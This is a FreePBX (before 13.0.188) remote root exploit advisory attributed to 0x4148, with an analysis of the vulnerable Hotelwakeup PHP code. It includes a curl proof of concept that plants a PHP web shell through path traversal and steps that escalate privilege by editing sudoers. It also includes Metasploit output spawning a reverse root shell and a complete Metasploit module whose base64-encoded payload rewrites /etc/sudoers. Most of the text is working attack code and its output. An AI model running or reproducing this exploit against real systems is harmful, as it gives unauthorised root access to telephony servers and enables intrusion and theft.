FreePBX Remote Command Execution

`#Title : Freepbx < 13.0.188 , Remote root exploit  
#Vulnerable software : Freepbx < 13.0.188  
#Author : Ahmed Sultan (0x4148)  
#Email : [email protected]  
#Current software status : patch released  
#Vendor : Sangoma <freepbx.org>  
  
=begin  
Freepbx 13.x are vulnerable to Remote command execution due to the insuffecient sanitization of the user input fields language,destination and also due to the lack of good authentication checking  
Technical details  
Vulnerable file : admin/modules/hotelwakeup/Hotelwakeup.class.php  
Line 102 :  
public function generateCallFile($foo) {  
...............................  
if (empty($foo['filename'])) {  
$foo['filename'] = "wuc.".$foo['time'].".ext.".$foo['ext'].".call"; <<<<<---------------------Vulnerable  
}  
...........................  
// Delete any old .call file with the same name as the one we are creating.  
if(file_exists($outfile) ) {  
unlink($outfile);  
}  
// Create up a .call file, write and close  
$wuc = fopen($tempfile, 'w');  
fputs( $wuc, "channel: Local/".$foo['ext']."@originate-skipvm\n" );  
fputs( $wuc, "maxretries: ".$foo['maxretries']."\n");  
fputs( $wuc, "retrytime: ".$foo['retrytime']."\n");  
fputs( $wuc, "waittime: ".$foo['waittime']."\n");  
fputs( $wuc, "callerid: ".$foo['callerid']."\n");  
fputs( $wuc, 'set: CHANNEL(language)='.$foo['language']."\n"); <<<<<---------------------Vulnerable  
fputs( $wuc, "application: ".$foo['application']."\n");  
fputs( $wuc, "data: ".$foo['data']."\n");  
fclose( $wuc );  
..........................  
The ext value can be manipulated by the attacker to change the output file path   
the language value can be manipulated by the attacket to load in malicious contents  
Function is called at  
Line 94 :   
public function addWakeup($destination, $time, $lang) {  
$date = $this->getConfig(); // module config provided by user  
$this->generateCallFile(array(  
"time" => $time,  
"date" => 'unused',  
"ext" => $destination, <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<================ Vulnerable [Filename field]  
"language" => $lang, <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<================ Vulnerable [language field loaded with malicious code]  
"maxretries" => $date['maxretries'],  
"retrytime" => $date['retrytime'],  
"waittime" => $date['waittime'],  
"callerid" => $date['cnam']." <".$date['cid'].">",  
"application" => 'AGI',  
"data" => 'wakeconfirm.php',  
));  
}  
addWakeup function is called when calling the hotelwakeup module via ajax.php and setting savecall as command  
Line 60 :   
switch($_REQUEST['command']) {  
case "savecall":  
if(empty($_POST['language'])) {  
$lang = 'en'; //default to English if empty  
} else {  
$lang = $_POST['language']; <<<<<<<<<<<<<<<<<<<===========================  
}  
............................................  
if ($badtime) {  
// abandon .call file creation and pop up a js alert to the user  
return array("status" => false, "message" => sprintf(_("Cannot schedule the call the scheduled time is in the past. [Time now: %s] [Wakeup Time: %s]"),date(DATE_RFC2822,$time_now),date(DATE_RFC2822,$time_wakeup)));  
} else {  
$this->addWakeup($_POST['destination'],$time_wakeup,$lang); <<<<<<<<<<<=======================  
return array("status" => true);  
}  
.................................  
POC :   
[0x4148:/lab]# curl "http://68.170.92.50:8080/admin/ajax.php" -H "Host: 68.170.92.50:8080" -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0" -H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" -H "Accept-Language: en-US,en;q=0.5" --compressed -H "Referer: http://68.170.92.50:8080/admin/ajax.php" -H "Cookie: lang=en_US; PHPSESSID=9sfgl5leajk74buajm0re2i014" -H "Connection: keep-alive" -H "Upgrade-Insecure-Requests: 1" --data "module=hotelwakeup&command=savecall&day=now&time="%"2B1 week&destination=/../../../../../../var/www/html/0x4148.php&language=<?php system('uname -a;id');?>"  
{"error":{"type":"Whoops\\Exception\\ErrorException","message":"touch(): Unable to create file \/var\/spool\/asterisk\/tmp\/wuc.1475613328.ext.\/..\/..\/..\/..\/..\/..\/var\/www\/html\/0x4148.php.call because No such file or directory","file":"\/var\/www\/html\/admin\/modules\/hotelwakeup\/Hotelwakeup.class.php","line":238}}#   
  
The error mean nothing , we still can get our malicious file via http://server:port/0x4148.php.call  
the server will ignore.call extn and will execute the php  
  
[0x4148:/lab]# curl "http://68.170.92.50:8080/0x4148.php.call"  
channel: Local//../../../../../../var/www/html/0x4148.php@originate-skipvm  
maxretries: 3  
retrytime: 60  
waittime: 60  
callerid: Wake Up Calls <*68>  
set: CHANNEL(language)=Linux HOUPBX 2.6.32-504.8.1.el6.x86_64 #1 SMP Wed Jan 28 21:11:36 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux  
uid=499(asterisk) gid=498(asterisk) groups=498(asterisk)  
application: AGI  
data: wakeconfirm.php  
  
Privelage can be escalated via adding the asterisk user to sudoers which can be done manually   
then echo a > /var/spool/asterisk/sysadmin/amportal_restart  
sleeping for few seconds  
then sudo bash -i  
  
MSF OUTPUT  
msf > use exploit/fpbx  
msf exploit(fpbx) > set RHOST 68.170.92.50  
RHOST => 68.170.92.50  
msf exploit(fpbx) > set RPORT 8080  
RPORT => 8080  
msf exploit(fpbx) > exploit  
  
[*] [2016.09.27-16:39:21] Started reverse TCP handler on 88.150.231.125:443  
[*] [2016.09.27-16:39:21] 68.170.92.50:8080 - Sending payload . . .  
[*] [2016.09.27-16:39:21] 68.170.92.50:8080 - Trying to execute payload  
[+] [2016.09.27-16:39:41] 68.170.92.50:8080 - Payload executed  
[*] [2016.09.27-16:39:41] 68.170.92.50:8080 - Spawning root shell <taking around 20 seconds in case of success>  
  
id  
uid=0(root) gid=0(root) groups=0(root)  
sh -i  
sh: no job control in this shell  
sh-4.1# pwd  
pwd  
/var/www/html  
sh-4.1# whoami  
whoami  
root  
sh-4.1#  
=end  
##  
# This module requires Metasploit: http://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'msf/core'  
  
class Metasploit4 < Msf::Exploit::Remote  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'FreePBX < 13.0.188.1 Remote root exploit',  
'Description' => '  
This module exploits an unauthenticated remote command execution in FreePBX module Hotelwakeup  
',  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'Ahmed sultan (0x4148) <[email protected]>', # discovery of vulnerability and msf module  
],  
'References' =>  
[  
"NA"  
],  
'Payload' =>  
{  
'Compat' =>  
{  
'PayloadType' => 'cmd',  
'RequiredCmd' => 'perl telnet python'  
}  
},  
'Platform' => %w(linux unix),  
'Arch' => ARCH_CMD,  
'Targets' => [['Automatic', {}]],  
'Privileged' => 'false',  
'DefaultTarget' => 0,  
'DisclosureDate' => 'Sep 27 2016'))  
end  
  
def print_status(msg = '')  
super("#{rhost}:#{rport} - #{msg}")  
end  
  
def print_error(msg = '')  
super("#{rhost}:#{rport} - #{msg}")  
end  
  
def print_good(msg = '')  
super("#{rhost}:#{rport} - #{msg}")  
end  
  
# Application Check  
def check  
res = send_request_cgi(  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, 'admin', 'ajax.php'),  
'headers' => {  
'Referer' => "http://#{datastore['RHOST']}/jnk0x4148stuff"  
},  
'vars_post' => {  
'module' => 'hotelwakeup',  
'command' => 'savecall'  
}  
)  
  
unless res  
vprint_error('Connection timed out.')  
end  
if res.body.include? "Referrer"  
vprint_good("Hotelwakeup module detected")  
return Exploit::CheckCode::Appears  
else  
Exploit::CheckCode::Safe  
end  
end  
def exploit  
vprint_status('Sending payload . . .')  
pwn = send_request_cgi(  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, 'admin', 'ajax.php'),  
'headers' => {  
'Referer' => "http://#{datastore['RHOST']}:#{datastore['RPORT']}/admin/ajax.php?module=hotelwakeup&action=savecall",  
'Accept' => "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",  
'User-agent' => "mostahter ;)"  
},  
'vars_post' => {  
'module' => 'hotelwakeup',  
'command' => 'savecall',  
'day' => 'now',  
'time' => '+1 week',  
'destination' => '/../../../../../../var/www/html/0x4148.php',  
'language' => '<?php echo "0x4148@r1z";if($_GET[\'r1zcmd\']!=\'\'){system("sudo ".$_GET[\'r1zcmd\']);}else{fwrite(fopen("0x4148.py","w+"),base64_decode("IyEvdXNyL2Jpbi9lbnYgcHl0aG9uCmltcG9ydCBvcwppbXBvcnQgdGltZQojIC0qLSBjb2Rpbmc6IHV0Zi04IC0qLSAKY21kID0gJ3NlZCAtaSBcJ3MvQ29tIEluYy4vQ29tIEluYy5cXG5lY2hvICJhc3RlcmlzayBBTEw9XChBTExcKVwgICcgXAoJJ05PUEFTU1dEXDpBTEwiXD5cPlwvZXRjXC9zdWRvZXJzL2dcJyAvdmFyL2xpYi8nIFwKCSdhc3Rlcmlzay9iaW4vZnJlZXBieF9lbmdpbmUnCm9zLnN5c3RlbShjbWQpCm9zLnN5c3RlbSgnZWNobyBhID4gL3Zhci9zcG9vbC9hc3Rlcmlzay9zeXNhZG1pbi9hbXBvcnRhbF9yZXN0YXJ0JykKdGltZS5zbGVlcCgyMCk="));system("python 0x4148.py");}?>',  
}  
)  
#vprint_status("#{pwn}")  
vprint_status('Trying to execute payload <taking around 20 seconds in case of success>')  
escalate = send_request_cgi(  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path, '0x4148.php.call'),  
'vars_get' => {  
'0x4148' => "r1z"  
}  
)  
if escalate.body.include? "0x4148@r1z"  
vprint_good("Payload executed")  
vprint_status("Spawning root shell")  
killit = send_request_cgi(  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path, '0x4148.php.call'),  
'vars_get' => {  
'r1zcmd' => "#{payload.encoded}"  
}  
)   
else  
vprint_error("Exploitation Failed")  
end  
end  
end`